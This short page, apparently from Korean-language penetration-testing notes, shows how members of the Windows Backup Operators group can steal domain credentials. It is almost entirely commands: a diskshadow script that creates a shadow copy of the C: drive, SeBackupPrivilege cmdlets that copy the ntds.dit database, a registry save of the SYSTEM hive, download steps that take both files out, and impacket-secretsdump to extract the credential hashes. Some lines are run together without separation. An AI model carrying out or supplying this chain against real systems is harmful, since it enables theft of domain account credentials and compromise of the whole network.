Backup Operators
Abuse
Root Cause


References
Last updated


Last updated
set context persistent nowriters
set metadata C:\\Windows\\Temp\\metedata.cab
set verbose on
add volume C: alias privesccopy
create
expose %privesccopy% x: unix2dos script.txt# DLL 파일 로드
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
# VSS를 통해 디스크 복제
diskshadow /s script.txt
# ntds 파일 다운로드
Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit C:\Windows\Temp\ntds.dit
download ntds.dit
# System 파일 다운로드
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
download SYSTEM
# 크리덴셜 복호화
impacket-secretsdump -system system -ntds ntds.dit LOCAL